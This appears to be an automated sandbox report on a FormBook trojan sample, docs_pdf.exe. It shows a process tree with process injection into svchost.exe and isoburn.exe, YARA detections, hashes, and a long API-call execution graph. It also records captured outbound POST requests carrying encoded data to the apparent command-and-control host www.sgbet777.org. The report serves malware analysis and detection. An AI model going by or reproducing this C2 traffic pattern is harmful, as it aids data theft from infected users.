                                                          X-Redirect-By: WordPress
                                                          Location: http://411divorce.com/6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxx
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: Prometheus
                                                          Pre-Cognitive-Push: Enabled
                                                          Quantum-Flux-Capacity: Omega
                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                          X-Grid-SRCache-TTL: 2592000
                                                          X-Grid-SRCache-Skip: -query_string
                                                          X-Grid-SRCache-Fetch: BYPASS
                                                          X-Grid-SRCache-Store: BYPASS
                                                          Data Ascii: bb\r\n\n<!--Cached using Nginx-Helper on 2024-07-12 17:05:55. It took 54 queries executed in 0.212 seconds.-->\n<!--Visit http://wordpress.org/extend/plugins/nginx-helper/faq/ for more details-->\r\n0\r\n\r\n


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          53          192.168.2.6  49777        64.46.102.70    80                5396  C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Jul 13, 2024 00:06:01.362500906 CEST  719                OUT        POST /aiec/ HTTP/1.1
                                                          Host: www.sgbet777.org
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sgbet777.org
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.sgbet777.org/aiec/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Ascii: D0Pts04=Tm7RFA5J8uCFNo74Q54pnd4ly6/jeHcPkd8BPeAOrcBqO2ReX4zJm9WvXPCYDHLx3yXGv3UgeCWp78ce//Gc2MUHedt3yWDIJRFN7j3gYaLuO6xW03xkvLuIVvYKgosiC4OqB5Qjbj81PF9VDU241S5THsfYk0T4oCHX+P5PuvR7AM56R2hTQXLhll0RIEC1XGKRZpPq4CHj
                                                          Jul 13, 2024 00:06:01.812640905 CEST  479                IN         HTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:06:01 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                          54          192.168.2.6  49778        64.46.102.70    80
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Jul 13, 2024 00:06:04.452641964 CEST  743                OUT        POST /aiec/ HTTP/1.1
                                                          Host: www.sgbet777.org
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sgbet777.org
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.sgbet777.org/aiec/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Ascii: D0Pts04=Tm7RFA5J8uCFMLz4DOEpyN4kr6/jJXcLkdwBPaYnrulqNXheW6LJh9WvcvCdOnLM3yT4v24geDyp74Qe4OGb3cUFLtt182DIJRFN7jjKYcjuOKBWljljhruPCfYKkosmC4P9B7kJbm41PARVDF277S5JKMeEt1KAwkKyws8i694bIa4gNFhwCHrjlnsjIkCfVGyRL+DN32iAGEsTvdKd2IHuYakl5GSjqw==
                                                          Jul 13, 2024 00:06:04.908385992 CEST  479                IN         HTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:06:04 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                          55          192.168.2.6  49779        64.46.102.70    80
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Jul 13, 2024 00:06:06.983510017 CEST  1756               OUT        POST /aiec/ HTTP/1.1
                                                          Host: www.sgbet777.org
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sgbet777.org
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.sgbet777.org/aiec/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:06:07.433316946 CEST 479 IN HTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:06:07 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>



                                                          Target ID:0
                                                          Start time:18:01:55
                                                          Start date:12/07/2024
                                                          Path:C:\Users\user\Desktop\docs_pdf.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\docs_pdf.exe"
                                                          Imagebase:0xf0000
                                                          File size:1'193'984 bytes
                                                          MD5 hash:4A7D2FD983AA91D5D3B7BEC3C430A825
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:18:01:56
                                                          Start date:12/07/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\docs_pdf.exe"
                                                          Imagebase:0x970000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:18:02:28
                                                          Start date:12/07/2024
                                                          Path:C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe"
                                                          Imagebase:0x80000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:5
                                                          Start time:18:02:29
                                                          Start date:12/07/2024
                                                          Path:C:\Windows\SysWOW64\isoburn.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                          Imagebase:0xd10000
                                                          File size:107'008 bytes
                                                          MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:18:02:42
                                                          Start date:12/07/2024
                                                          Path:C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe"
                                                          Imagebase:0x80000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:10
                                                          Start time:18:02:54
                                                          Start date:12/07/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff728280000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:4%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:3%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:153
Mailbox 59 API calls 98846->98847 98848 f4de5 98847->98848 98849 f538e 59 API calls 98848->98849 98850 f4df1 _memmove 98849->98850 98851 f4ee9 98850->98851 98852 f4f21 98850->98852 98856 f4e2c 98850->98856 99044 f4fe9 CreateStreamOnHGlobal 98851->99044 99055 159ba5 95 API calls 98852->99055 98853 f5027 69 API calls 98862 f4e35 98853->98862 98856->98853 98857 f506b 74 API calls 98857->98862 98858 f4ec9 98858->98731 98860 12dcd0 98861 f5045 85 API calls 98860->98861 98863 12dce4 98861->98863 98862->98857 98862->98858 98862->98860 99050 f5045 98862->99050 98864 f506b 74 API calls 98863->98864 98864->98858 98866 f507d 98865->98866 98868 12ddf6 98865->98868 99079 115812 98866->99079 98870 159393 99277 1591e9 98870->99277 98872 1593a9 98872->98739 98874 f5036 98873->98874 98875 12ddb9 98873->98875 99282 115e90 98874->99282 98877 f503e 98877->98741 98879 f4d2e 98878->98879 98880 f4d6a LoadLibraryA 98878->98880 98879->98832 98879->98835 98880->98879 98881 f4d7b GetProcAddress 98880->98881 98881->98879 98885 1154ac _raise 98882->98885 98883 1154bf 98931 118d68 58 API calls __getptd_noexit 98883->98931 98885->98883 98887 1154f0 98885->98887 98886 1154c4 98932 118ff6 9 API calls __mbschr_l 98886->98932 98901 120738 98887->98901 98890 1154f5 98891 11550b 98890->98891 98892 1154fe 98890->98892 98893 115535 98891->98893 98894 115515 98891->98894 98933 118d68 58 API calls __getptd_noexit 98892->98933 98916 120857 98893->98916 98934 118d68 58 API calls __getptd_noexit 98894->98934 98896 1154cf _raise @_EH4_CallFilterFunc@8 98896->98838 98902 120744 _raise 98901->98902 98903 119e4b __lock 58 API calls 98902->98903 98913 120752 98903->98913 98904 1207c6 98936 12084e 98904->98936 98905 1207cd 98941 118a5d 58 API calls 2 library calls 98905->98941 98908 120843 _raise 98908->98890 98909 1207d4 98909->98904 98942 11a06b InitializeCriticalSectionAndSpinCount 98909->98942 98912 119ed3 __mtinitlocknum 58 API calls 98912->98913 98913->98904 98913->98905 98913->98912 98939 116e8d 59 API 
calls __lock 98913->98939 98940 116ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98913->98940 98914 1207fa EnterCriticalSection 98914->98904 98925 120877 __wopenfile 98916->98925 98917 120891 98947 118d68 58 API calls __getptd_noexit 98917->98947 98919 120a4c 98919->98917 98923 120aaf 98919->98923 98920 120896 98948 118ff6 9 API calls __mbschr_l 98920->98948 98922 115540 98935 115562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98922->98935 98944 1287f1 98923->98944 98925->98917 98925->98919 98949 113a0b 60 API calls 2 library calls 98925->98949 98927 120a45 98927->98919 98950 113a0b 60 API calls 2 library calls 98927->98950 98929 120a64 98929->98919 98951 113a0b 60 API calls 2 library calls 98929->98951 98931->98886 98932->98896 98933->98896 98934->98896 98935->98896 98943 119fb5 LeaveCriticalSection 98936->98943 98938 120855 98938->98908 98939->98913 98940->98913 98941->98909 98942->98914 98943->98938 98952 127fd5 98944->98952 98946 12880a 98946->98922 98947->98920 98948->98922 98949->98927 98950->98929 98951->98919 98953 127fe1 _raise 98952->98953 98954 127ff7 98953->98954 98957 12802d 98953->98957 99037 118d68 58 API calls __getptd_noexit 98954->99037 98956 127ffc 99038 118ff6 9 API calls __mbschr_l 98956->99038 98963 12809e 98957->98963 98960 128049 99039 128072 LeaveCriticalSection __unlock_fhandle 98960->99039 98962 128006 _raise 98962->98946 98964 1280be 98963->98964 98965 11471a __wsopen_nolock 58 API calls 98964->98965 98968 1280da 98965->98968 98966 119006 __invoke_watson 8 API calls 98967 1287f0 98966->98967 98970 127fd5 __wsopen_helper 103 API calls 98967->98970 98969 128114 98968->98969 98976 128137 98968->98976 99012 128211 98968->99012 98971 118d34 __lseeki64 58 API calls 98969->98971 98972 12880a 98970->98972 98973 128119 98971->98973 98972->98960 98974 118d68 __mbschr_l 58 API calls 98973->98974 98975 128126 98974->98975 98978 118ff6 __mbschr_l 9 API calls 98975->98978 98977 1281f5 98976->98977 98985 1281d3 98976->98985 98979 118d34 
__lseeki64 58 API calls 98977->98979 98980 128130 98978->98980 98981 1281fa 98979->98981 98980->98960 98982 118d68 __mbschr_l 58 API calls 98981->98982 98983 128207 98982->98983 98984 118ff6 __mbschr_l 9 API calls 98983->98984 98984->99012 98986 11d4d4 __alloc_osfhnd 61 API calls 98985->98986 98987 1282a1 98986->98987 98988 1282ab 98987->98988 98989 1282ce 98987->98989 98991 118d34 __lseeki64 58 API calls 98988->98991 98990 127f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98989->98990 98999 1282f0 98990->98999 98992 1282b0 98991->98992 98994 118d68 __mbschr_l 58 API calls 98992->98994 98993 12836e GetFileType 98997 1283bb 98993->98997 98998 128379 GetLastError 98993->98998 98996 1282ba 98994->98996 98995 12833c GetLastError 99000 118d47 __dosmaperr 58 API calls 98995->99000 99001 118d68 __mbschr_l 58 API calls 98996->99001 99008 11d76a __set_osfhnd 59 API calls 98997->99008 99002 118d47 __dosmaperr 58 API calls 98998->99002 98999->98993 98999->98995 99004 127f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98999->99004 99005 128361 99000->99005 99001->98980 99003 1283a0 CloseHandle 99002->99003 99003->99005 99006 1283ae 99003->99006 99007 128331 99004->99007 99010 118d68 __mbschr_l 58 API calls 99005->99010 99009 118d68 __mbschr_l 58 API calls 99006->99009 99007->98993 99007->98995 99014 1283d9 99008->99014 99011 1283b3 99009->99011 99010->99012 99011->99005 99012->98966 99013 128594 99013->99012 99016 128767 CloseHandle 99013->99016 99014->99013 99015 121b11 __lseeki64_nolock 60 API calls 99014->99015 99032 12845a 99014->99032 99017 128443 99015->99017 99018 127f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99016->99018 99019 118d34 __lseeki64 58 API calls 99017->99019 99017->99032 99021 12878e 99018->99021 99019->99032 99020 1210ab 70 API calls __read_nolock 99020->99032 99022 128796 GetLastError 99021->99022 99023 1287c2 99021->99023 99024 118d47 __dosmaperr 58 API calls 99022->99024 99023->99012 99025 1287a2 
99024->99025 99028 11d67d __free_osfhnd 59 API calls 99025->99028 99026 120d2d __close_nolock 61 API calls 99026->99032 99027 12848c 99029 1299f2 __chsize_nolock 82 API calls 99027->99029 99027->99032 99028->99023 99029->99027 99030 121b11 60 API calls __lseeki64_nolock 99030->99032 99031 11dac6 __write 78 API calls 99031->99032 99032->99013 99032->99020 99032->99026 99032->99027 99032->99030 99032->99031 99033 128611 99032->99033 99034 120d2d __close_nolock 61 API calls 99033->99034 99035 128618 99034->99035 99036 118d68 __mbschr_l 58 API calls 99035->99036 99036->99012 99037->98956 99038->98962 99039->98962 99041 f4ce1 99040->99041 99042 f4d9d LoadLibraryA 99040->99042 99041->98842 99041->98845 99042->99041 99043 f4dae GetProcAddress 99042->99043 99043->99041 99045 f5003 FindResourceExW 99044->99045 99049 f5020 99044->99049 99046 12dd5c LoadResource 99045->99046 99045->99049 99047 12dd71 SizeofResource 99046->99047 99046->99049 99048 12dd85 LockResource 99047->99048 99047->99049 99048->99049 99049->98856 99051 12ddd4 99050->99051 99052 f5054 99050->99052 99056 115a7d 99052->99056 99054 f5062 99054->98862 99055->98856 99057 115a89 _raise 99056->99057 99058 115a9b 99057->99058 99060 115ac1 99057->99060 99069 118d68 58 API calls __getptd_noexit 99058->99069 99071 116e4e 99060->99071 99062 115aa0 99070 118ff6 9 API calls __mbschr_l 99062->99070 99063 115ac7 99077 1159ee 83 API calls 5 library calls 99063->99077 99066 115ad6 99078 115af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 99066->99078 99068 115aab _raise 99068->99054 99069->99062 99070->99068 99072 116e80 EnterCriticalSection 99071->99072 99073 116e5e 99071->99073 99075 116e76 99072->99075 99073->99072 99074 116e66 99073->99074 99076 119e4b __lock 58 API calls 99074->99076 99075->99063 99076->99075 99077->99066 99078->99068 99082 11582d 99079->99082 99081 f508e 99081->98870 99083 115839 _raise 99082->99083 99084 115874 _raise 99083->99084 99085 11587c 99083->99085 99086 11584f _memset 99083->99086 
99084->99081 99087 116e4e __lock_file 59 API calls 99085->99087 99109 118d68 58 API calls __getptd_noexit 99086->99109 99088 115882 99087->99088 99095 11564d 99088->99095 99091 115869 99110 118ff6 9 API calls __mbschr_l 99091->99110 99099 115668 _memset 99095->99099 99101 115683 99095->99101 99096 115673 99207 118d68 58 API calls __getptd_noexit 99096->99207 99098 115678 99208 118ff6 9 API calls __mbschr_l 99098->99208 99099->99096 99099->99101 99104 1156c3 99099->99104 99111 1158b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 99101->99111 99103 1157d4 _memset 99210 118d68 58 API calls __getptd_noexit 99103->99210 99104->99101 99104->99103 99112 114916 99104->99112 99119 1210ab 99104->99119 99187 120df7 99104->99187 99209 120f18 58 API calls 3 library calls 99104->99209 99109->99091 99110->99084 99111->99084 99113 114920 99112->99113 99114 114935 99112->99114 99211 118d68 58 API calls __getptd_noexit 99113->99211 99114->99104 99116 114925 99212 118ff6 9 API calls __mbschr_l 99116->99212 99118 114930 99118->99104 99120 1210e3 99119->99120 99121 1210cc 99119->99121 99123 12181b 99120->99123 99127 12111d 99120->99127 99222 118d34 58 API calls __getptd_noexit 99121->99222 99238 118d34 58 API calls __getptd_noexit 99123->99238 99124 1210d1 99223 118d68 58 API calls __getptd_noexit 99124->99223 99129 121125 99127->99129 99136 12113c 99127->99136 99128 121820 99239 118d68 58 API calls __getptd_noexit 99128->99239 99224 118d34 58 API calls __getptd_noexit 99129->99224 99132 121131 99240 118ff6 9 API calls __mbschr_l 99132->99240 99133 12112a 99225 118d68 58 API calls __getptd_noexit 99133->99225 99135 121151 99226 118d34 58 API calls __getptd_noexit 99135->99226 99136->99135 99138 12116b 99136->99138 99140 121189 99136->99140 99167 1210d8 99136->99167 99138->99135 99143 121176 99138->99143 99227 118a5d 58 API calls 2 library calls 99140->99227 99213 125ebb 99143->99213 99144 121199 99146 1211a1 99144->99146 99147 1211bc 99144->99147 99145 12128a 99149 121303 
ReadFile 99145->99149 99154 1212a0 GetConsoleMode 99145->99154 99228 118d68 58 API calls __getptd_noexit 99146->99228 99230 121b11 60 API calls 3 library calls 99147->99230 99152 1217e3 GetLastError 99149->99152 99153 121325 99149->99153 99151 1211a6 99229 118d34 58 API calls __getptd_noexit 99151->99229 99156 1217f0 99152->99156 99157 1212e3 99152->99157 99153->99152 99161 1212f5 99153->99161 99158 121300 99154->99158 99159 1212b4 99154->99159 99236 118d68 58 API calls __getptd_noexit 99156->99236 99171 1212e9 99157->99171 99231 118d47 58 API calls 3 library calls 99157->99231 99158->99149 99159->99158 99162 1212ba ReadConsoleW 99159->99162 99169 12135a 99161->99169 99170 1215c7 99161->99170 99161->99171 99162->99161 99164 1212dd GetLastError 99162->99164 99163 1217f5 99237 118d34 58 API calls __getptd_noexit 99163->99237 99164->99157 99167->99104 99168 112f95 _free 58 API calls 99168->99167 99173 1213c6 ReadFile 99169->99173 99177 121447 99169->99177 99170->99171 99176 1216cd ReadFile 99170->99176 99171->99167 99171->99168 99174 1213e7 GetLastError 99173->99174 99181 1213f1 99173->99181 99174->99181 99175 1214f4 99233 118d68 58 API calls __getptd_noexit 99175->99233 99180 1216f0 GetLastError 99176->99180 99186 1216fe 99176->99186 99177->99171 99177->99175 99179 121504 99177->99179 99182 1214b4 MultiByteToWideChar 99177->99182 99179->99182 99234 121b11 60 API calls 3 library calls 99179->99234 99180->99186 99181->99169 99232 121b11 60 API calls 3 library calls 99181->99232 99182->99164 99182->99171 99186->99170 99235 121b11 60 API calls 3 library calls 99186->99235 99188 120e02 99187->99188 99192 120e17 99187->99192 99274 118d68 58 API calls __getptd_noexit 99188->99274 99190 120e07 99275 118ff6 9 API calls __mbschr_l 99190->99275 99193 120e4c 99192->99193 99199 120e12 99192->99199 99276 126234 58 API calls __malloc_crt 99192->99276 99195 114916 __filbuf 58 API calls 99193->99195 99196 120e60 99195->99196 99241 120f97 99196->99241 99198 120e67 99198->99199 99200 
114916 __filbuf 58 API calls 99198->99200 99199->99104 99201 120e8a 99200->99201 99201->99199 99202 114916 __filbuf 58 API calls 99201->99202 99203 120e96 99202->99203 99203->99199 99204 114916 __filbuf 58 API calls 99203->99204 99205 120ea3 99204->99205 99206 114916 __filbuf 58 API calls 99205->99206 99206->99199 99207->99098 99208->99101 99209->99104 99210->99098 99211->99116 99212->99118 99214 125ed3 99213->99214 99215 125ec6 99213->99215 99217 125edf 99214->99217 99218 118d68 __mbschr_l 58 API calls 99214->99218 99216 118d68 __mbschr_l 58 API calls 99215->99216 99219 125ecb 99216->99219 99217->99145 99220 125f00 99218->99220 99219->99145 99221 118ff6 __mbschr_l 9 API calls 99220->99221 99221->99219 99222->99124 99223->99167 99224->99133 99225->99132 99226->99133 99227->99144 99228->99151 99229->99167 99230->99143 99231->99171 99232->99181 99233->99171 99234->99182 99235->99186 99236->99163 99237->99171 99238->99128 99239->99132 99240->99167 99242 120fa3 _raise 99241->99242 99243 120fb0 99242->99243 99244 120fc7 99242->99244 99246 118d34 __lseeki64 58 API calls 99243->99246 99245 12108b 99244->99245 99247 120fdb 99244->99247 99248 118d34 __lseeki64 58 API calls 99245->99248 99249 120fb5 99246->99249 99251 121006 99247->99251 99252 120ff9 99247->99252 99256 120ffe 99248->99256 99250 118d68 __mbschr_l 58 API calls 99249->99250 99269 120fbc _raise 99250->99269 99254 121013 99251->99254 99255 121028 99251->99255 99253 118d34 __lseeki64 58 API calls 99252->99253 99253->99256 99258 118d34 __lseeki64 58 API calls 99254->99258 99259 11d446 ___lock_fhandle 59 API calls 99255->99259 99257 118d68 __mbschr_l 58 API calls 99256->99257 99261 121020 99257->99261 99262 121018 99258->99262 99260 12102e 99259->99260 99263 121041 99260->99263 99264 121054 99260->99264 99267 118ff6 __mbschr_l 9 API calls 99261->99267 99265 118d68 __mbschr_l 58 API calls 99262->99265 99266 1210ab __read_nolock 70 API calls 99263->99266 99268 118d68 __mbschr_l 58 API calls 99264->99268 99265->99261 
99270 12104d 99266->99270 99267->99269 99271 121059 99268->99271 99269->99198 99273 121083 __read LeaveCriticalSection 99270->99273 99272 118d34 __lseeki64 58 API calls 99271->99272 99272->99270 99273->99269 99274->99190 99275->99199 99276->99193 99280 11543a GetSystemTimeAsFileTime 99277->99280 99279 1591f8 99279->98872 99281 115468 __aulldiv 99280->99281 99281->99279 99283 115e9c _raise 99282->99283 99284 115ec3 99283->99284 99285 115eae 99283->99285 99287 116e4e __lock_file 59 API calls 99284->99287 99296 118d68 58 API calls __getptd_noexit 99285->99296 99289 115ec9 99287->99289 99288 115eb3 99297 118ff6 9 API calls __mbschr_l 99288->99297 99298 115b00 67 API calls 6 library calls 99289->99298 99292 115ed4 99299 115ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99292->99299 99294 115ee6 99295 115ebe _raise 99294->99295 99295->98877 99296->99288 99297->99295 99298->99292 99299->99294 99300->98748 99301->98761 99302->98763 99303->98759 99304->98769 99306 f92c9 Mailbox 99305->99306 99307 12f5c8 99306->99307 99312 f92d3 99306->99312 99308 110ff6 Mailbox 59 API calls 99307->99308 99310 12f5d4 99308->99310 99309 f92da 99309->98773 99312->99309 99313 f9df0 59 API calls Mailbox 99312->99313 99313->99312 99314->98780 99315->98779 99321 